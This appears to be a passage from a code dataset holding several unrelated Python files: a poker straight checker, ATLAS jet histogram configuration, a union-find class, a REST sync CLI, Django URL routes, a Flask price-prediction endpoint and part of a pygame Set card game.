Solution:\n def IsContinuous(self, numbers):\n # write code here\n if numbers == []:\n return False\n\n numbers = sorted(numbers)\n count = numbers.count(0)\n length = len(numbers) - 1\n for i in range(length, count, -1):\n if numbers[i] == numbers[i - 1]:\n return False\n else:\n count = count - (numbers[i] - numbers[i - 1] - 1)\n if count < 0:\n return False\n return True\n","sub_path":"剑指office/扑克牌顺子.py","file_name":"扑克牌顺子.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"391677932","text":"# Copyright (C) 2002-2020 CERN for the benefit of the ATLAS collaboration\n\nfrom AthenaCommon import SystemOfUnits\nfrom JetMonitoring.JetMonitoringConfig import HistoSpec, EventHistoSpec, VarSpec, ConfigDict, ToolSpec\n\n# *********************************************** \n# ***********************************************\n# The list of \"jet variables\" which are not simple floats, or aliases to simple floats.\n# A VarSpec specifies:\n# 1) the name of a jet attribute\n# 2) its type\n# 3) optional and only if type is vector, the index of the element of the vector to be plotted\n# (simple floats can be generated on-the-fly just by their name. they don't need a spec)\n\nknownVar = dict( \n mass = VarSpec('m:GeV', 'float'),\n JVF = VarSpec('JVF', 'vecfloat'),\n EPS = VarSpec('EnergyPerSampling', 'vecfloat'),\n\n # this variable has an index specified. 
It will thus have only 1 value per jet: the JVF at pos 0\n JVF0 = VarSpec('JVF', 'vecfloat', 0),\n\n)\n\n\nknownEventVar = dict( \n # These always are of type 'float'\n avgMu = ToolSpec('EventHistoVarTool', 'avgMu', Attribute='averageInteractionsPerCrossing'),\n actMu = ToolSpec('EventHistoVarTool', 'actMu', Attribute='actualInteractionsPerCrossing'),\n njets = ToolSpec('NumJetVarTool', 'njets', ),\n njetsPt20 = ToolSpec('NumJetVarTool', 'njetsPt20', PtCut=20.),\n njetsPt50 = ToolSpec('NumJetVarTool', 'njetsPt50', PtCut=50.),\n njetsEt20 = ToolSpec('NumJetVarTool', 'njetsEt20', EtCut=20.),\n njetsEt50 = ToolSpec('NumJetVarTool', 'njetsEt50', EtCut=50.),\n njetsEt40Eta1_2 = ToolSpec('NumJetVarTool', 'njetsEt40Eta1_2', EtCut=50., EtaMin=1., EtaMax=2.),\n)\n\n# ***************************************\n# The list of standard jet histograms.\n# This is a list of specifications, each describing how to histogram a jet variable into 1D or 2D histos.\n# A specification is a specialized dictionary (a HistoSpec, see JetMonitoringConfig.py)\n# The format is:\n# HistoSpec( name , bins , optional_arguments... )\n# where 'name' is a string and 'bins' is a tuple as in (nbin,xmin,xmax) or (nbinx,xmin,xmax,nbiny,ymin,ymax) \n# See various commented examples below for optional arguments.\n\n_knownHistos = [\n # Simple form : histogram of variable 'eta' (the name of spec is the same as the name of variable)\n # As in TH1 ctor, ';' in the title is interpreted as in \"Main Title;Title xAxis;Title yAxis\"\n HistoSpec( 'eta', (50,-5,5) , title='#eta;#eta;Entries'),\n HistoSpec( 'phi', (50,-3.3,3.3) , title='#phi;#phi;Entries'),\n # Same but we indicate that the variable is to be plotted in GeV by appending ':GeV'\n HistoSpec( 'pt:GeV', (100,0,200) , title='p_{T};p_{T} [GeV];'), \n HistoSpec( 'm:GeV', (100,0,300) , title='mass;mass [GeV];'),\n HistoSpec( 'e:GeV', (100,0,500) , title='E;E [GeV];'), \n HistoSpec( 'et:GeV', (100,0,750), title='E_{T};E_{T} [GeV];'),\n\n # We want another pT histo, with different bins.\n # We add a new spec with a new name and we indicate the actual variable with the argument xvar\n HistoSpec( 'highpt', (100,0.,4000) , title='p_{T};p_{T} [GeV];', xvar='pt:GeV'), \n\n #EventHistoSpec( 'njets', (30,0,30), title='Jet Multiplicity;Njets;Entries' ),\n # When the jet variable is not a simple float, use the xvar argument to refer to a detailed variable spec in 'knownVar'\n HistoSpec( 'JVF', (100,0,1.2) , title='Jet Vtx Frac;JVF;', xvar='JVF'), \n # if the var name contains '[N]' the system will assume the variable is a vector and setup tools accordingly (so we don't need to specify 'xvar')\n HistoSpec( 'JVF[0]', (100,0,1.2) , title='JVF for vtx 0;JVF[0];', ), \n HistoSpec( 'JVF[1]', (100,0,1.2) , title='JVF for vtx 1;JVF[1];', ),\n\n\n # full list\n HistoSpec('ptN', (250, 0.0, 5000.0), title='Jet Pt;Pt [GeV];', xvar='pt:GeV'),\n\n HistoSpec('EMFrac', (50, -0.1, 1.4), title='EM Fraction;EM fraction;', ),\n HistoSpec('LArQuality', (50, -0.4, 1.2), title='LAr quality;Energy;', ),\n HistoSpec('HECQuality', (50, -0.1, 1.4), title='HEC Quality;HEC Quality;', ),\n HistoSpec('HECFrac', (50, -0.1, 1.4), title='HEC Fraction;HEC fraction;', ),\n HistoSpec('AverageLArQF', (100, 0, 65535), title='Average LAr QF;AverageLArQF;', ),\n HistoSpec('FracSamplingMaxIndex', (24, 0, 24), title='FracSamplingMaxIndex; FracSamplingMaxIndex;', xvar=VarSpec('FracSamplingMaxIndex','int')),\n HistoSpec('FracSamplingMax', (50, -0.1, 1.2), title='FracSamplingMax; FracSamplingMax;', ),\n HistoSpec('Timing', (40, -20, 20), 
title='Jet Time info;Time;', ),\n\n \n HistoSpec('LeadingClusterSecondLambda', (100, 0.0, 10000.0), title='LeadingClusterSecondLambda; LeadingClusterSecondLambda;', ),\n HistoSpec('LeadingClusterSecondR', (100, 0.0, 100000.0), title='LeadingClusterSecondR; LeadingClusterSecondR;', ),\n HistoSpec('OotFracClusters5', (50, -0.1, 1.2), title='OotFracClusters5; OotFracClusters5;', ),\n HistoSpec('OotFracClusters10', (50, -0.1, 1.2), title='OotFracClusters10; OotFracClusters10;', ),\n \n HistoSpec('Jvt', (70, -0.2, 1.2), title='Jet JVT;JVT;', ),\n HistoSpec('JVFCorr', (120, -1.2, 1.2), title='Jet JVT; JVFCorr;', ),\n HistoSpec('JvtRpt', (75, 0, 1.5), title='Jet JVT Rpt; JVTRpt;', ),\n HistoSpec('EM3Frac', (50,-0.1,1.0), title=\"EM3 fraction;EM3 fraction;Entries\"),\n HistoSpec('Tile0Frac', (50,-0.1,1.0), title=\"Tile0 fraction;Tile0 fraction;Entries\"),\n\n\n HistoSpec('GhostMuonSegmentCount', (60, 0, 60), title='Number of associated muon segments;Number;', xvar=VarSpec('GhostMuonSegmentCount','int')),\n HistoSpec('GhostTruthCount', (60, 0, 60), title='Number of associate truth part;Number;', xvar=VarSpec('GhostTruthCount','int')),\n HistoSpec('GhostTrackCount', (60, 0, 60), title='Number of associate tracks;Number;', xvar=VarSpec('GhostTrackCount','int')),\n HistoSpec('GhostTruthAssociationFraction', (50, 0, 1.0), title='Fraction of associated truth particles from a matched truth jet jet;GhostTruthAssociationFraction;', ),\n \n HistoSpec('Width', (50, 0, 1.0), title='Jet Width;Width;', ),\n HistoSpec('Width15', (50, 0, 1.5), title='Jet Width;Width;', xvar='Width'),\n HistoSpec('Mu12', (100, 0, 1.0), title='Mu12;Mu12;', ),\n\n HistoSpec('NumTrkPt500[0]', (100, 0, 100), title='Number of tracks from PV0 above 0.5 GeV:N_{tracks}(p_{T}>0.5 GeV);NumTrkPt500;Entries', ),\n HistoSpec('NumTrkPt1000[0]', (100, 0, 100), title='Number of all tracks above 1 GeV:N_{tracks}(p_{T}>1 GeV);NumTrkPt1000;Entries', ),\n HistoSpec('SumPtTrkPt500[0]:GeV', (100, 0, 200), title='Sum Pt of all tracks above 0.5 GeV:SumPtTrk(p_{T}>0.5 GeV);SumPtTrkPt500 [GeV];Entries', ),\n HistoSpec('SumPtChargedPFOPt500[0]:GeV', (100, 0, 200), title='Sum Pt of all charged PFO above 0.5 GeV:SumPtChargedPFO(p_{T}>0.5 GeV);SumPtChargedPFOPt500 [GeV];Entries', ),\n HistoSpec('fCharged', (100, 0, 2), title='Normalised sum Pt of all charged PFO above 0.5 GeV:fCharged(p_{T}>0.5 GeV);fCharged;Entries', ),\n\n HistoSpec('FoxWolfram4', (100, -1, 1), title='FoxWolfram0;FoxWolfram4;', ),\n HistoSpec('FoxWolfram0', (100, -1, 1), title='FoxWolfram0;FoxWolfram0;', ),\n HistoSpec('FoxWolfram1', (100, -1, 1), title='FoxWolfram0;FoxWolfram1;', ),\n HistoSpec('FoxWolfram2', (100, -1, 1), title='FoxWolfram0;FoxWolfram2;', ),\n HistoSpec('FoxWolfram3', (100, -1, 1), title='FoxWolfram0;FoxWolfram3;', ),\n\n HistoSpec('ZCut12', (100, 0, 1.0), title='ZCut12;ZCut12;', ),\n HistoSpec('ZCut23', (100, 0, 1.0), title='ZCut23;ZCut23;', ),\n HistoSpec('ZCut34', (100, 0, 1.0), title='ZCut34;ZCut34;', ),\n\n HistoSpec('KtDR', (100, 0, 10), title='KtDR;KtDR;', ),\n \n HistoSpec('Split12', (100, 0, 5000), title='Split12;Split12;', ),\n HistoSpec('Split23', (100, 0, 5000), title='Split23;Split23;', ),\n HistoSpec('Split34', (100, 0, 5000), title='Split34;Split34;', ),\n\n HistoSpec('D2', (100, -1, 1), title='D2;D2;', ),\n HistoSpec('D2_Beta2', (100, -1, 1), title='D2_Beta2;D2_Beta2;', ),\n\n HistoSpec('ThrustMaj', (100, -1, 2), title='ThrustMaj;ThrustMaj;', ),\n HistoSpec('ThrustMin', (100, -1, 2), title='ThrustMin;ThrustMin;', ),\n \n HistoSpec('ECF2', (100, 0, 10000), 
title='ECF2;ECF2;', ),\n HistoSpec('ECF3', (100, 0, 10000), title='ECF3;ECF3;', ),\n HistoSpec('ECF1', (100, 0, 10000), title='ECF1;ECF1;', ),\n HistoSpec('ECF1_Beta2', (100, -1, 1), title='ECF1_Beta2;ECF1_Beta2;', ),\n HistoSpec('ECF3_Beta2', (100, -1, 1), title='ECF3_Beta2;ECF3_Beta2;', ),\n HistoSpec('ECF2_Beta2', (100, -1, 1), title='ECF2_Beta2;ECF2_Beta2;', ),\n\n HistoSpec('DipExcl12', (100, -1, 2), title='DipExcl12;DipExcl12;', ),\n HistoSpec('Dip12', (100, -1, 2), title='Dip12;Dip12;', ),\n HistoSpec('Dip23', (100, -1, 2), title='Dip23;Dip23;', ),\n HistoSpec('Dip13', (100, -1, 2), title='Dip13;Dip13;', ),\n \n HistoSpec('C1_Beta2', (100, -1, 1), title='C1;C1;', xvar='C1'),\n HistoSpec('C2_Beta2', (100, -1, 1), title='C2_Beta2;C2_Beta2;', ),\n HistoSpec('C2', (100, -1, 1), title='C2;C2;', ),\n HistoSpec('C1', (100, -1, 1), title='C1;C1;', ),\n\n HistoSpec('NegativeE:GeV', (80, -10, 0), title='Negative E in Jet;Energy;', ),\n HistoSpec('N90Constituents', (15, 0, 15), title='N90Constituents; N90Constituents;', ),\n\n HistoSpec('BchCorrDotx', (50, 0, 1), title='BchCorrDotx:BchCorrDotx;', ),\n HistoSpec('BchCorrCell', (50, 0, 1), title='BchCorrCell:BchCorrCell;', ),\n\n \n HistoSpec('TrackWidthPt1000[0]', (75, 0.0, 1.5), title='Width from tracks from PV0 above 1 GeV:Track Width(p_{T}>1 GeV);', ),\n\n\n HistoSpec('Volatility', (100, -100, 100), title='Volatility;Volatility;', ),\n HistoSpec('PlanarFlow', (100, -1, 1.1), title='PlanarFlow;PlanarFlow;', ),\n HistoSpec('CentroidR', (100, 0, 7500), title='CentroidR; CentroidR;', ),\n HistoSpec('Sphericity', (100, 0, 1), title='Sphericity;Sphericity;', ),\n HistoSpec('Aplanarity', (100, 0, 1), title='Aplanarity;Aplanarity;', ),\n HistoSpec('Angularity', (100, -0.1, 0.1), title='Angularity;Angularity;', ),\n\n\n\n HistoSpec('Tau1', (100, 0, 1.0), title='Tau1;Tau1;', ),\n HistoSpec('Tau2', (100, 0, 1.0), title='Tau2;Tau2;', ),\n HistoSpec('Tau3', (100, 0, 1.0), title='Tau3;Tau3;', ),\n HistoSpec('Tau21', (100, 0, 1.0), title='Tau21;Tau21;', ),\n HistoSpec('Tau32', (100, 0, 1.0), title='Tau32;Tau32;', ),\n HistoSpec('Tau1_wta', (100, 0, 1.0), title='Tau1_wta;Tau1_wta;', ),\n HistoSpec('Tau3_wta', (100, 0, 1.0), title='Tau3_wta;Tau3_wta;', ),\n HistoSpec('Tau2_wta', (100, 0, 1.0), title='Tau2_wta;Tau2_wta;', ),\n HistoSpec('Tau21_wta', (100, 0, 1.0), title='Tau21_wta;Tau21_wta;', ),\n HistoSpec('Tau32_wta', (100, 0, 1.0), title='Tau32_wta;Tau32_wta;', ),\n\n HistoSpec('Charge', (100, -2, 2), title='Charge;Charge;', ),\n\n HistoSpec('ActiveArea', (80, 0, 0.8), title='Active Area;Area;', ),\n HistoSpec('ActiveArea15', (80, 0, 1.5), title='Active Area;Area;', xvar='ActiveArea'),\n\n HistoSpec('PullPhi', (100, -6.3, 6.3), title='PullPhi;PullPhi;', ),\n HistoSpec('PullMag', (100, 0, 100), title='PullMag;PullMag;', ),\n HistoSpec('Pull_C10', (100, -1, 1), title='Pull_C10;Pull_C10;', ),\n HistoSpec('Pull_C11', (100, -1, 1), title='Pull_C11;Pull_C11;', ),\n HistoSpec('Pull_C01', (100, -1, 1), title='Pull_C01;Pull_C01;', ),\n HistoSpec('Pull_C00', (100, -1, 1), title='Pull_C00;Pull_C00;', ),\n\n HistoSpec('ShowerDeconstructionW', (100, -100, 100), title='ShowerDeconstructionW;ShowerDeconstructionW;', ),\n HistoSpec('ShowerDeconstructionTop', (100, -100, 100), title='ShowerDeconstructionTop;ShowerDeconstructionTop;', ),\n\n\n HistoSpec( 'JetConstitScaleMomentum_eta', (50,-5,5) , title='ConstitScale #eta;ConstitScale #eta;Entries'),\n HistoSpec( 'JetConstitScaleMomentum_phi', (50,-3.3,3.3) , title='ConstitScale #phi;ConstitScale #phi;Entries'),\n 
HistoSpec( 'JetConstitScaleMomentum_pt:GeV', (100,0,200) , title='ConstitScale p_{T};ConstitScale p_{T} [GeV];Entries'), \n HistoSpec( 'JetConstitScaleMomentum_m:GeV', (100,0,300) , title='ConstitScale mass;ConstitScale mass [GeV];Entries'),\n \n HistoSpec( 'JetEMScaleMomentum_eta', (50,-5,5) , title='EMScale #eta;EMScale #eta;Entries'),\n HistoSpec( 'JetEMScaleMomentum_phi', (50,-3.3,3.3) , title='EMScale #phi;EMScale #phi;Entries'),\n HistoSpec( 'JetEMScaleMomentum_pt:GeV', (100,0,200) , title='EMScale p_{T};EMScale p_{T} [GeV];Entries'), \n HistoSpec( 'JetEMScaleMomentum_m:GeV', (100,0,300) , title='EMScale mass;EMScale mass [GeV];Entries'),\n\n HistoSpec( 'JetPileupScaleMomentum_eta', (50,-5,5) , title='PileupScale #eta;PileupScale #eta;Entries'),\n HistoSpec( 'JetPileupScaleMomentum_phi', (50,-3.3,3.3) , title='PileupScale #phi;PileupScale #phi;Entries'),\n HistoSpec( 'JetPileupScaleMomentum_pt:GeV', (100,0,200) , title='PileupScale p_{T};PileupScale p_{T} [GeV];Entries'), \n HistoSpec( 'JetPileupScaleMomentum_m:GeV', (100,0,300) , title='PileupScale mass;PileupScale mass [GeV];Entries'),\n\n HistoSpec( 'JetEtaJESScaleMomentum_eta', (50,-5,5) , title='EtaJESScale #eta;EtaJESScale #eta;Entries'),\n HistoSpec( 'JetEtaJESScaleMomentum_phi', (50,-3.3,3.3) , title='EtaJESScale #phi;EtaJESScale #phi;Entries'),\n HistoSpec( 'JetEtaJESScaleMomentum_pt:GeV', (100,0,200) , title='EtaJESScale p_{T};EtaJESScale p_{T} [GeV];Entries'), \n HistoSpec( 'JetEtaJESScaleMomentum_m:GeV', (100,0,300) , title='EtaJESScale mass;EtaJESScale mass [GeV];Entries'),\n # ---------------------\n # 2D histogram (x and y vars are separated by ';' )\n HistoSpec( 'pt:GeV;m:GeV', (100,0,1000, 100,0,300) , title='mass vs p_{T};p_{T};mass [GeV];'),\n\n]\n \n\n# ---------------------\n# Below we add specifications for custom monitoring tools used to create histograms not drawable from simple attribute/variables.\n# We rely on the generic 'ToolSpec' dictionnary.\n# Format is: ToolSpec('ToolClassName', 'toolName', defineHistoFunc=aFunction , ...properties...) where \n# - defineHistoFunc is mandatory. It must be a function with signature similar as HistoSpec.defineHisto\n# and dedicated to define histograms as in standard monitoring configuration.\n# - properties are properties of the 'ToolClassName'. They will be transfered to the c++\n# instance. 
If a property is itself a tool, it can be specified as a ToolSpec.\n# \n\n# -- JetHistoLeadingJetsRelations specification\n# The python helper defining the histograms using the monitoring framework :\ndef defineHistoForLeadingJets(conf, parentAlg, monhelper, path): \n \n # helpfor that generates the monitoring group#\n group = monhelper.addGroup(parentAlg, conf.Group, 'Jets/'+parentAlg.JetContainerName)\n path = 'standardHistos'\n group.defineHistogram('dEta;leadJetsDEta', path=path, xbins=100, xmin=-5, xmax=5) \n group.defineHistogram('dPhi;leadJetsDPhi', path=path, xbins=100, xmin=-3, xmax=3) \n group.defineHistogram('dR;leadJetsDR', path=path, xbins=100, xmin=0, xmax=10) \n \n\n# Add the specifications\n_knownHistos += [ \n ToolSpec('JetHistoLeadingJetsRelations', 'leadingJetsRel', defineHistoFunc=defineHistoForLeadingJets, Group='LeadingJetGroup',)\n]\n\n\n\n\n# -- JetHistoResponseAndEff specification\n# this tools allows to plot a fixed set of efficiency and response histos vs truth (or any other reference container).\n# The python helper defining the histograms using the monitoring framework :\ndef defineHistoForRespAndEff(conf, parentAlg, monhelper , path):\n # create a monitoring group with the histo path starting from the parentAlg\n group = monhelper.addGroup(parentAlg, conf.Group, 'Jets/'+parentAlg.JetContainerName)\n path = 'standardHistos'\n # define the histogram\n group.defineHistogram('passDr1,refPt;efficiencyR1',title='Passing deltaR<0.1', type=\"TEfficiency\", path=path, xbins=100 , xmin=0, xmax=4000. ,)\n group.defineHistogram('passDr2,refPt;efficiencyR2',title='Passing deltaR<0.2', type=\"TEfficiency\", path=path, xbins=100 , xmin=0, xmax=4000. ,)\n group.defineHistogram('passDr3,refPt;efficiencyR3',title='Passing deltaR<0.3', type=\"TEfficiency\", path=path, xbins=100 , xmin=0, xmax=4000. ,)\n group.defineHistogram('relDiff',title='pT relative Diff', type=\"TH1F\", path=path, xbins=100 , xmin=-2, xmax=2. ,)\n group.defineHistogram('refEta,relDiff',title='pT relative Diff vs Eta', type=\"TH2F\", path=path, xbins=60 , xmin=-5, xmax=5., ybins=60 , ymin=-2, ymax=2. ,)\n group.defineHistogram('refPt,relDiff',title='pT relative Diff vs pT', type=\"TH2F\", path=path, xbins=60 , xmin=0, xmax=5000., ybins=60 , ymin=-2, ymax=2. 
,)\n\n_knownHistos += [ \n ToolSpec('JetHistoResponseAndEff', 'respVsAntiKt4Truth', defineHistoFunc=defineHistoForRespAndEff, Group='AntiK4TruthRespGroup', RefContainerName=\"AntiKt4TruthJets\", EnergyScale=1./SystemOfUnits.GeV),\n ToolSpec('JetHistoResponseAndEff', 'respVsAntiKt10TruthTrim', defineHistoFunc=defineHistoForRespAndEff, Group='AntiK10TruthTrimRespGroup', RefContainerName=\"AntiKt10TruthTrimmedPtFrac5SmallR20Jets\", EnergyScale=1./SystemOfUnits.GeV),\n]\n# purely for convenience we add a map of JetContainer name -> JetHistoResponseAndEff spec\nresponseAndEffSpecMap = dict(\n AntiKt4TruthJets = 'respVsAntiKt4Truth',\n AntiKt10TruthTrimmedPtFrac5SmallR20Jets = 'respVsAntiKt10TruthTrim',\n )\n\n\n\n\n# --\nknownHistos = ConfigDict( )\n# convert the list into a dictionnary indexed by spec name\nfor h in _knownHistos:\n knownHistos[h.name] = h\n\n\n\n\n\n# **********************************************************\n# commented out example of a defineHistoFunc suitable for custom tool specifications\n# def defineHistoForHistoPtTool(conf, parentAlg, monhelper , path):\n# group = monhelper.addGroup(parentAlg, conf.Group, parentAlg.JetContainerName+'/')\n \n# group.defineHistogram('jetPt', path='TestPtTool', xbins=100, xmin=0, xmax=160)\n\n\n# ***************************************\n# The list of known JetSelectorTool\n#from JetSelectorTools.JetSelectorToolsConf import JetCleaningTool\nknownSelector = dict(\n LooseBad = ToolSpec('JetCleaningTool' , \"LooseBadJets\" , CutLevel = \"LooseBad\")\n)\n","sub_path":"Reconstruction/Jet/JetMonitoring/python/JetStandardHistoSpecs.py","file_name":"JetStandardHistoSpecs.py","file_ext":"py","file_size_in_byte":18035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"40264865","text":"class UnionFind:\n def __init__(self, size):\n self.size = size\n self.numOfComponents = size\n self.id = []\n self.sz = []\n self._construct()\n\n def _construct(self):\n for index in range(self.size):\n self.id.append(index)\n self.sz.append(1)\n\n def find(self, index):\n root = index\n while root != self.id[root]:\n root = self.id[root]\n\n while index != root:\n next = self.id[index]\n self.id[index] = root\n index = next\n return root\n\n def connected(self, ele1, ele2):\n return self.find(ele1) == self.find(ele2)\n\n def components(self):\n return self.numOfComponents\n\n def unify(self, index1, index2):\n root1 = self.find(index1)\n root2 = self.find(index2)\n\n if root1 == root2:\n return\n if self.sz[root1] > self.sz[root2]:\n self.sz[root1] += self.sz[root2]\n self.id[root2] = root1\n else:\n self.sz[root2] += self.sz[root1]\n self.id[root1] = root2\n self.numOfComponents -= 1\n return True\n\n\nufo = UnionFind(10)\nprint(ufo.unify(4, 7))\nprint(ufo.unify(3, 7))\nprint(ufo.id)\nprint(ufo.find(4))\nprint(ufo.connected(3, 4))\nprint(ufo.numOfComponents)","sub_path":"data_structs/unionFind_ds.py","file_name":"unionFind_ds.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"32862874","text":"\nimport sys\n\nfrom api import RESTHandler, getProjects, createNewProject, createNewScriptType\nimport parsed\nfrom time import sleep\n\ndef getHelp():\n print(\"Missing argument: Server. 
Use sync like this: python3 sync.py [server (local or centralized)] [flags]\")\n print(\"Potentional flags\")\n print(\"--use-http: Forces the use of http over https (local will always use http\")\n\ndef getProjectId(handler):\n projects = getProjects(handler)\n projects.append({'id':'', 'name':'Create new project...'})\n print(\"Choose project to upload to\")\n for project, counter in zip(projects, range(len(projects))):\n print(\"%2i: %s\" %(counter, project['name']))\n print(\"Select project (c to cancel)\")\n chosen = input(\">>>\")\n try:\n numb = int(chosen)\n except:\n # value is not a number\n print(\"Bye!\")\n sys.exit(1)\n if projects[numb]['id'] == '': # create new project\n id = createNewProject(handler)\n else:\n id = projects[numb]['id']\n \n return id\n\n\ndef getTypes(handler, id):\n print(\"\\n\\n\")\n print(\"Time to choose script types\")\n result = handler.get(\"/project/\")\n j = result.json()\n spesificProject = {}\n \n for p in j:\n if p['id'] == id:\n spesificProject = p\n sts = spesificProject['scriptTypes']\n sts.append({'id':'', 'name':'Create new script type...'})\n if (len(sts) == 1):\n print(\"No existsing types found\")\n return createNewScriptType(handler, id)\n else:\n for t, i in zip(sts, range(len(sts))):\n print(\"%2i: %s\" % (i, t['name']))\n \n \n print(\"Choose script type (c to cancel)\")\n\n try:\n n = int(input(\">>>\"))\n except:\n print(\"bye!\")\n sys.exit(1)\n if sts[n]['id'] == '': # create new\n return createNewScriptType(handler, id)\n return sts[n]['id']\n\ndef uploadParsed(handler, projectId, scriptId):\n print(\"Choose mode: (c to cancel)\")\n print(\" 0: upload folder\")\n print(\" 1: upload file\")\n try:\n c = int(input(\">>>\"))\n except:\n print(\"bye!\")\n sys.exit(1)\n options = [parsed.folder, parsed.fileUpload]\n if (c > 1 or c < 0):\n print(\"wrong format\")\n return uploadParsed(handler, projectId, scriptId)\n return options[c](handler, projectId, scriptId)\n\ndef main():\n print(\"Welcome to set traces data sync\")\n\n args = sys.argv\n if len(args) < 2:\n print(\"not enough arguments\")\n getHelp()\n sys.exit(1)\n \n protocol = \"https://\"\n\n if (\"--use-http\" in args or args[1] == \"local\"):\n protocol = \"http://\"\n\n localUrl = protocol+\"localhost:8080\"\n centralizedUrl = protocol+\"backend.settraces.com\"\n\n if args[1] == \"help\":\n getHelp()\n sys.exit(1)\n\n if args[1] == \"local\":\n url = localUrl\n elif args[1] == \"centralized\":\n url = centralizedUrl\n else:\n print(\"Missing argument: Server. Use sync like this: python3 sync.py [server (local or centralized)] [flags]\")\n print(\"Use python3 sync.py help - to get more help\")\n \n print(\"\\n\")\n print(\"Using backend located at: %s\" % url)\n print(\"\\n\")\n\n handler = RESTHandler(url)\n\n id = getProjectId(handler)\n print(\"Using projectId: %s\" % id)\n typeId = getTypes(handler, id)\n print(\"\\n\")\n print(\"Using script type id: %s\" % typeId)\n print(\"\\n\")\n print(\"\\n\")\n print(\"Choose mode:\")\n print(\"0. Upload parsed data\")\n sleep(.5)\n print(\"... 
Choosing Upload due to lack of other choices\")\n\n options = [uploadParsed]\n\n options[0](handler, id, typeId)\n\nif __name__ == '__main__':\n main()\n #handler = RESTHandler(\"http://localhost:8080\")\n #uploadParsed(handler, 'eaf8bbc4-ba82-45bc-bbaa-8eb88c0d2f27', '00a27082-f7ea-4e15-9f6d-1ee373543f3a')","sub_path":"sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"165020945","text":"from django.conf.urls import url\n\nfrom . import views\napp_name='stock'\nurlpatterns=[\n\turl(r'^login/$', views.login,name='login'),\n\turl(r'^auth/$',views.auth_view, name='auth_view'),\n\turl(r'^logout/$',views.logout, name='logout'),\n\turl(r'^auth/$',views.auth_view, name='auth_view'),\n\turl(r'^loggedin/$',views.loggedin, name='loggedin'),\n\turl(r'^invalid/$',views.invalid_login, name='invalid_login'),\n\turl(r'^register/$',views.register, name='register'),\n\turl(r'^register_success/$',views.register_success, name='register_success'),\n\turl(r'^menu/$',views.menu, name='menu'),\n\turl(r'^location/$',views.location, name='location'),\n\turl(r'^location_success/$',views.location_success, name='location_success'),\n\turl(r'^update/$',views.update, name='update'),\n\turl(r'^list/$',views.list, name='list'),\n\turl(r'^stock_success/$',views.stock_success, name='stock_success'),\n\t#url(r'^(?P[a-z]+)/stock_not_exist/$',views.stock_not_exist, name='stock_not_exist'),\n\turl(r'^list/$',views.list, name='list'),\n\turl(r'^delete/$',views.delete, name='delete'),\n\t\t\n]","sub_path":"stock/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"143965656","text":"from flask import Flask\nfrom flask import request\nimport pandas as pd\nimport numpy as np\nimport pickle\napp = Flask(__name__)\ndef enter_here(mileage, year, make_model, years, original_price, Type):\n\tpl = pickle.load(open( \"pl\", \"rb\" ))\n\tdf_ex = pd.DataFrame({'Mileage':float(mileage), 'Year':float(year),'Make_Model':make_model, 'Years': float(years),'Original Price':float(original_price), 'Type':Type},index=[0])\n\treturn 'After %d years and %d mileage, your %s will be worth $%d' % (years, mileage, make_model, pl.predict(df_ex).tolist()[0])\n \n@app.route(\"/predict\")\ndef hello():\n\tmileage = request.args.get('mileage')\n\tyear = request.args.get('year')\n\tmake_model = request.args.get('make_model').replace('%20', ' ')\n\tyears = request.args.get('years')\n\toriginal_price = request.args.get('original_price')\n\tType = request.args.get('Type').replace('%20', ' ')\n\t# print(mileage, year, make_model, years, original_price, Type)\n\tresult = enter_here(int(mileage), int(year), make_model, int(years), int(original_price), Type)\n\treturn result","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"142155299","text":"'''\nset.py\nAdi Faintuch\n7/15/19\n'''\n'''\nSome thing that I need to do:\n\n-fill in the README\n -good link: https://thehftguy.com/2016/10/24/heres-how-to-make-a-good-github-project-for-your-resume/\n'''\n\nimport pygame\nfrom random import shuffle\nimport model\nfrom collections import defaultdict\n\nclicked_image = pygame.image.load('/Users/adifaintuch/Desktop/set/src/clicked.png')\n\ndef make_image_clicked(image_key, image_value, 
surface, image_list, displayed_cards):\n '''makes the image clicked'''\n new_x = image_value.x - 5\n new_y = image_value.y - 5\n new_width = image_value.width + 10\n new_height = image_value.height + 10\n new_rect = pygame.Rect(new_x, new_y, new_width, new_height)\n\n pygame.draw.rect(surface, (255, 242, 56), new_rect)\n surface.blit(image_key.image, image_value)\n\ndef make_image_unclicked(image_key, image_value, surface, image_list, displayed_cards):\n '''makes the image unclicked'''\n new_x = image_value.x - 5\n new_y = image_value.y - 5\n new_width = image_value.width + 10\n new_height = image_value.height + 10\n new_rect = pygame.Rect(new_x, new_y, new_width, new_height)\n\n pygame.draw.rect(surface, (0, 0, 0), new_rect)\n surface.blit(image_key.image, image_value)\n\ndef make_player_clicked(x, y, width, height, surface, player1_clicked, player2_clicked):\n '''makes the player1 or player2 card clicked'''\n new_x = x - 5\n new_y = y - 5\n new_width = width + 10\n new_height = height + 10\n new_rect = pygame.Rect(new_x, new_y, new_width, new_height)\n\n pygame.draw.rect(surface, (255, 242, 56), new_rect)\n\n if(player1_clicked):\n display_player1(surface)\n else:\n display_player2(surface)\n\ndef make_player_unclicked(x, y, width, height, surface, player1_clicked, player2_clicked):\n '''makes the player1 or player2 card unclicked'''\n new_x = x - 5\n new_y = y - 5\n new_width = width + 10\n new_height = height + 10\n new_rect = pygame.Rect(new_x, new_y, new_width, new_height)\n\n pygame.draw.rect(surface, (0, 0, 0), new_rect)\n\n if(player1_clicked):\n display_player1(surface)\n else:\n display_player2(surface)\n\ndef create_initial_display_card_positions(displayed_cards):\n '''created the initial displayed_cards positions'''\n upper_left_x = 40 #plus 230 each time\n upper_left_y = 30 #plus 149 every 3 cards\n\ndef display_cards_initial(displayed_cards, image_list, surface, total_score, deck_size, single_player, player1_score, player2_score):\n '''displays the cards for the first time'''\n if(single_player):\n pygame.display.set_mode((700, 750))\n display_score_single(surface, total_score)\n else:\n pygame.display.set_mode((1000, 750))\n 